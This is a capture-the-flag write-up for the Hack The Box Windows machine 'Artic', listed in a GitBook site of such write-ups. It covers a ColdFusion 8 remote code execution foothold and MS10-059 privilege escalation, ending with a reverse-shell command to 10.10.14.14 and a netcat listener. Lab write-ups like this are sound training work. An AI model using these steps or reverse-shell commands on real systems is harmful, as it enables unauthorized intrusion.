Write-Ups
  • Intro
  • Active Directory
    • HTB | Forest
    • HTB | Sauna
    • HTB | Active
    • HTB | Blackfield
    • HTB | Resolute
    • HTB | Cascade
    • HTB | Cicada
    • HTB | Administrator
    • HTB | Authority
    • HTB | Office
  • Windows
    • HTB | Devel
    • HTB | Chatterbox
    • HTB | SecNotes
    • HTB | Access
    • HTB | Jeeves
    • HTB | Artic
    • HTB | Bastard
    • HTB | Bastion
    • HTB | Querier
  • Linux
    • HTB | BoardLight
    • THM | CMess
    • THM | ConvertMyVideo
    • HTB | Editorial
    • HTB | Mirai
    • HTB | Nibbles
    • HTB | Help
    • HTB | SwagShop
    • HTB | Jarvis
    • HTB | Sea
    • HTB | Chemistry
Powered by GitBook
On this page
  • NMAP
  • Port 8500
  • Foothold/ shell
  • Priv Esc
  1. Windows

HTB | Artic

PreviousHTB | JeevesNextHTB | Bastard

Last updated 8 months ago

This is a Windows box. You can find it here.

Skill Learned

  • Exploit modification (MS10-59)

NMAP

IP:10.10.10.11

Port 8500

Found Adobe ColdFusion Login

Foothold/ shell

found RCE for Version 8

edit rhost, rport and lhost, lport and run the exploit.

and we are in. Found user.txt

Priv Esc

Copy winpeacers to the box

and run the exe

not able to run the exe, might be AV is stopping us the run.

Let's copy powerUp.ps1

For some reason, PowerShell is not also working

Let's try windows-exploit-suggester

Copy the systeminfo output from the box and run the exploit

since MS10-59 is a kernel exploit let's try it first

Let's copy the exe to box

start the nc and run the exe 

MS10-059.exe 10.10.14.14 1234

Found the root.txt

nmap scan
Port 8500
Adobe ColdFusion Login
searchsploit
shell
user.txt
python3 -m http.server 80
certutil
running winpeasx64
running windows-exploit-suggester
MS10-059.exe 10.10.14.14 1234
nc -nlvp 1234
root.txt